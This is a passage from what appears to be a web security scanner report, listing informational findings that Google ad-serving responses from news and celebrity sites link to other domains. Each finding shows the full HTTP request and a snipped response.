<!doctype html><html><head><style>a{color:#b47b10}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
<div style="right:2px;position:absolute;top:2px"><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://bostonherald.com/entertainment/%26hl%3Den%26client%3Dca-pub-1030395994297178%26adU%3DYouTube.com/LiveRunway%26adT%3DFashion%2BWeek%2BSpring%2B2012%26adU%3Dwww.bloomspot.com/Boston%26adT%3DBoston%2526%252339%253Bs%2BTop%2BRestaurants%26adU%3Dwww.artinstitutes.edu%26adT%3DFashion%2BMerchandising%26adU%3DArt-Schools.US.com%26adT%3DTop%2BFashion%2BColleges%26gl%3DUS&amp;usg=AFQjCNHgP6yduO76K8-1dysbbXtQYIK4ww" target=_blank><img alt="AdChoices" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png" ></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

17.73. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-1030395994297178&output=html&h=250&slotname=7623399685&w=300&lmt=1316257290&flash=10.3.183&url=http%3A%2F%2Fwww.bostonherald.com%2Fnews%2F&dt=1316239290244&bpp=266&shv=r20110907&jsv=r20110914&correlator=1316239290962&frm=4&adk=221221083&ga_vid=611537932.1316021623&ga_sid=1316239291&ga_hid=1927014896&ga_fc=1&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=0&biw=1071&bih=870&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=904&xpc=z62hmeYFip&p=http%3A//www.bostonherald.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 17 Sep 2011 01:00:05 GMT
Server: cafe
Cache-Control: private
Content-Length: 13166
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#b47b10}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
<div style="right:2px;position:absolute;top:2px"><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.bostonherald.com/news/%26hl%3Den%26client%3Dca-pub-1030395994297178%26adU%3Dwww.bloomspot.com/Boston%26adT%3DBoston%2526%252339%253Bs%2BTop%2BRestaurants%26adU%3Damericanjobsact.com/obama-jobs-plan%26adT%3DThe%2BObama%2BJobs%2BPlan:%26adU%3Dwww.newsmax.com/surveys%26adT%3DRick%2BPerry%2Bin%2B2012%253F%26adU%3Dwww.AceTicket.com%26adT%3DBoston%2BRed%2BSox%2BTickets%26gl%3DUS&amp;usg=AFQjCNEUKETKUoWrg7YvEkzuzDQ78W2Xww" target=_blank><img alt="AdChoices" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png" ></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

17.74. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-1030395994297178&output=html&h=250&slotname=7623399685&w=300&lmt=1316257528&flash=10.3.183&url=http%3A%2F%2Fbostonherald.com%2Fnews%2F&dt=1316239528345&bpp=401&shv=r20110907&jsv=r20110914&correlator=1316239528756&frm=4&adk=221221083&ga_vid=611537932.1316021623&ga_sid=1316239291&ga_hid=1746984113&ga_fc=1&u_tz=-300&u_his=8&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=0&biw=1071&bih=870&eid=36887101&ref=http%3A%2F%2Fbostonherald.com%2Ftrack%2F&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=816&xpc=4gkdj84IBp&p=http%3A//bostonherald.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 17 Sep 2011 01:04:03 GMT
Server: cafe
Cache-Control: private
Content-Length: 13224
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#b47b10}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
<div style="right:2px;position:absolute;top:2px"><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://bostonherald.com/news/%26hl%3Den%26client%3Dca-pub-1030395994297178%26adU%3Dwww.roohanimadad.com%26adT%3Dspiritual%2Bhelp%26adU%3Dwww.PremiumAstrology.com%26adT%3DRomance%2B%2526amp%253B%2BLove%2BHoroscope%26adU%3DAboutAstro.com/horoscope%26adT%3DYour%2BZodiac%2BHoroscope%26adU%3DFireFromTheHeartland.com%26adT%3DMichele%2BBachmann%2BDVD%26gl%3DUS&amp;usg=AFQjCNGzB6Gfoz99tOc2GV4nYm2QezeQlQ" target=_blank><img alt="AdChoices" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png" ></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

17.75. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-7832112837345590&output=html&h=90&slotname=9104404504&w=728&lmt=1316257025&flash=10.3.183&url=http%3A%2F%2Fwww.tmz.com%2F2011%2F09%2F15%2Fmichaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-cheating-marriage-white-house-crashers-real-housewives-of-dc%2F%3Fadid%3Dhero3&dt=1316239025252&bpp=15&shv=r20110907&jsv=r20110914&correlator=1316239025277&frm=4&adk=974859732&ga_vid=2017251405.1316239025&ga_sid=1316239025&ga_hid=357070949&ga_fc=0&u_tz=-300&u_his=8&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=14&biw=1071&bih=870&eid=44901218&ref=http%3A%2F%2Fwww.tmz.com%2F2011%2F09%2F16%2Fron-artest-name-change-official-metta-world-peace-legal-judge-petition-granted-lakers%2F%3Fadid%3Dhero2&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=240&xpc=BQ2gldImiP&p=http%3A//www.tmz.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 17 Sep 2011 00:55:40 GMT
Server: cafe
Cache-Control: private
Content-Length: 4193
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=functio
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png' alt="(i)" border=0 height=15px width=19px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.tmz.com/2011/09/15/michaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-cheating-marriage-white-house-crashers-real-housewives-of-dc/%253Fadid%253Dhero3%26hl%3Den%26client%3Dca-pub-7832112837345590%26adU%3Dwww.Facebook.com/BuxomCosmetics%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNGClRXWoYkTxXO5r7067uwjnRv0pQ" target=_blank><img alt="AdChoices" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110907/r20110914/abg.js"></script>
...[SNIP]...

17.76. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-7832112837345590&output=html&h=250&slotname=7188170409&w=300&lmt=1316257030&flash=10.3.183&url=http%3A%2F%2Fwww.tmz.com%2F2011%2F09%2F15%2Fmichaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-cheating-marriage-white-house-crashers-real-housewives-of-dc%2F%3Fadid%3Dhero3&dt=1316239030507&bpp=13&shv=r20110907&jsv=r20110914&prev_slotnames=9104404504%2C7188170409&correlator=1316239025277&frm=4&adk=672172102&ga_vid=2017251405.1316239025&ga_sid=1316239025&ga_hid=357070949&ga_fc=0&u_tz=-300&u_his=8&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=14&biw=1071&bih=870&eid=44901218%2C36887101&ref=http%3A%2F%2Fwww.tmz.com%2F2011%2F09%2F16%2Fron-artest-name-change-official-metta-world-peace-legal-judge-petition-granted-lakers%2F%3Fadid%3Dhero2&prodhost=googleads.g.doubleclick.net&fu=0&ifi=3&dtd=204&xpc=idK0X9TNEY&p=http%3A//www.tmz.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 17 Sep 2011 00:55:45 GMT
Server: cafe
Cache-Control: private
Content-Length: 4049
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=functio
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png' alt="(i)" border=0 height=15px width=19px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.tmz.com/2011/09/15/michaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-cheating-marriage-white-house-crashers-real-housewives-of-dc/%253Fadid%253Dhero3%26hl%3Den%26client%3Dca-pub-7832112837345590%26adU%3Drasqal.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNE2m14UGDHWUbC_wMWVmIAPJuWaTA" target=_blank><img alt="AdChoices" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110907/r20110914/abg.js"></script>
...[SNIP]...

17.77. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-7832112837345590&output=html&h=250&slotname=7188170409&w=300&lmt=1316256721&flash=10.3.183&url=http%3A%2F%2Fwww.toofab.com%2F&dt=1316238721641&bpp=15&shv=r20110907&jsv=r20110914&prev_slotnames=9104404504&correlator=1316238718686&frm=4&adk=1193615914&ga_vid=1160930501.1316238719&ga_sid=1316238719&ga_hid=1889546765&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=16&biw=1071&bih=870&eid=36887101&prodhost=googleads.g.doubleclick.net&fu=0&ifi=2&dtd=240&xpc=XB0udw8jWy&p=http%3A//www.toofab.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 17 Sep 2011 00:50:39 GMT
Server: cafe
Cache-Control: private
Content-Length: 8503
X-XSS-Protection: 1; mode=block

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 25 10:42:47 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
1%253B%253B%257Esscs%253D%253fhttp://sites.target.com/site/en/spot/page.jsp?title=quilted_northern&intc=null_dvmy110001000048000802_null&ref=tgt_adv_XCJS4607afid=d_google&cpng=vfquiltednorthern&dfa=1"><img src="http://s0.2mdn.net/2906542/11dvm_quiltednorthern_banners_300x250.jpg" width="300" height="250" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png' alt="(i)" border=0 height=15px width=19px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.toofab.com/%26hl%3Den%26client%3Dca-pub-7832112837345590%26adU%3Dsites.target.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNHDebn02m2sWkEMdPuGXVEUjvYE7A" target=_blank><img alt="AdChoices" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110907/r20110914/abg.js"></script>
...[SNIP]...

17.78. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-1030395994297178&output=html&h=280&slotname=8490313844&w=336&lmt=1316257313&flash=10.3.183&url=http%3A%2F%2Fbostonherald.com%2Fnews%2Fregional%2Fview.bg%3Farticleid%3D1366356%26position%3D1&dt=1316239313154&bpp=66&shv=r20110907&jsv=r20110914&correlator=1316239313230&frm=4&adk=1829132337&ga_vid=611537932.1316021623&ga_sid=1316239291&ga_hid=609185102&ga_fc=1&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=12&biw=1071&bih=870&eid=36887101&ref=http%3A%2F%2Fwww.bostonherald.com%2Fnews%2F&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=1074&xpc=IkjyPNe30S&p=http%3A//bostonherald.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 17 Sep 2011 01:00:28 GMT
Server: cafe
Cache-Control: private
Content-Length: 13801
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#006699}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
<div style="right:2px;position:absolute;top:2px"><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://bostonherald.com/news/regional/view.bg%253Farticleid%253D1366356%2526position%253D1%26hl%3Den%26client%3Dca-pub-1030395994297178%26adU%3Dwww.PremiumAstrology.com%26adT%3DScary%2BAccurate%2BHoroscopes%26adU%3DAboutAstro.com/horoscope%26adT%3DYour%2BZodiac%2BHoroscope%26adU%3Dwww.Life-Answers.com/Horoscope%26adT%3DYour%2BFree%2BHoroscope%26adU%3DGoodSeatTickets.com/Boston-Bruins%26adT%3DCheap%2B-%2BBruins%2BTickets%26gl%3DUS&amp;usg=AFQjCNEaDzzcLMJvHD-nR_ZVfaQAVKZTqg" target=_blank><img alt="AdChoices" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png" ></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

17.79. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-3196826191648604&output=html&h=90&slotname=1265524507&w=728&lmt=1316238190&flash=10.3.183&url=http%3A%2F%2Fwww.courier-mta.org%2Fimap%2F&dt=1316220190484&bpp=14&shv=r20110907&jsv=r20110914&correlator=1316220190521&frm=4&adk=249849476&ga_vid=394619177.1316220191&ga_sid=1316220191&ga_hid=2016020975&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=times%20new%20roman&dfs=16&biw=1087&bih=870&eid=36887101&ref=http%3A%2F%2Fduckduckgo.com%2F%3Fq%3Dimap%2Bserver&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=59&xpc=x3iiVtIAQZ&p=http%3A//www.courier-mta.org HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 16 Sep 2011 19:42:17 GMT
Server: cafe
Cache-Control: private
Content-Length: 3824
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style><!--
a:link { color: #ffffff }a:visited { color: #ffffff }a:hover { color: #ffffff }a:active { color: #ffffff } --></style><script><!--
(function(){window.ss=functio
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png' alt="(i)" border=0 height=15px width=19px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.courier-mta.org/imap/%26hl%3Den%26client%3Dca-pub-3196826191648604%26adU%3Dwww.rackspace.com/cloud%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNHAJ2TjmOgbENUJdsQjYon6lic3WQ" target=_blank><img alt="AdChoices" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110907/r20110914/abg.js"></script>
...[SNIP]...

17.80. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-1030395994297178&output=html&h=250&slotname=7623399685&w=300&lmt=1316257719&flash=10.3.183&url=http%3A%2F%2Fbostonherald.com%2Fnews%2F&dt=1316239719357&bpp=269&shv=r20110907&jsv=r20110914&correlator=1316239719637&frm=4&adk=221221083&ga_vid=611537932.1316021623&ga_sid=1316239291&ga_hid=378166624&ga_fc=1&u_tz=-300&u_his=16&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=0&adx=716&ady=2329&biw=1071&bih=870&eid=36887102&ref=http%3A%2F%2Fbostonherald.com%2Ftrack%2Finside_track%2Fview%2F20110907sox_with_heels%2F&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=1362&xpc=dnIq8uZ7th&p=http%3A//bostonherald.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 17 Sep 2011 01:07:14 GMT
Server: cafe
Cache-Control: private
Content-Length: 12278
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#b47b10}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
<div style="right:2px;position:absolute;top:2px"><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://bostonherald.com/news/%26hl%3Den%26client%3Dca-pub-1030395994297178%26adU%3Dwww.PremiumAstrology.com%26adT%3DRomance%2B%2526amp%253B%2BLove%2BHoroscope%26adU%3Dwww.roohanimadad.com%26adT%3Dspiritual%2Bhelp%26adU%3DAboutAstro.com/horoscope%26adT%3DYour%2BZodiac%2BHoroscope%26gl%3DUS&amp;usg=AFQjCNFxVfoBVqD_WwJBtBBwp4TNIiyY7Q" target=_blank><img alt="AdChoices" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png" ></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

17.81. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-7832112837345590&output=html&h=90&slotname=9104404504&w=728&lmt=1316256804&flash=10.3.183&url=http%3A%2F%2Fwww.tmz.com%2F&dt=1316238804013&bpp=11&shv=r20110907&jsv=r20110914&correlator=1316238804075&frm=4&adk=974859732&ga_vid=1637260738.1316238804&ga_sid=1316238804&ga_hid=348414659&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=14&biw=1071&bih=870&eid=36887101&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=167&xpc=NRBXsgh7yZ&p=http%3A//www.tmz.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 17 Sep 2011 00:52:00 GMT
Server: cafe
Cache-Control: private
Content-Length: 12009
X-XSS-Protection: 1; mode=block

<style>body{margin:0;padding:0}</style><script>window.dabtiming={report:function(){},load:{tick:function(){}}};</script><div id="google_flash_inline_div" style="position:relative;z-index:1001;width:72
...[SNIP]...
<div id="google_flash_div" style="position:absolute;left:0px;z-index:1001"><OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="google_flash_obj" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" WIDTH="728" HEIGHT="90"><PARAM NAME=movie VALUE="http://pagead2.googlesyndication.com/pagead/TemplateContainer.swf">
...[SNIP]...
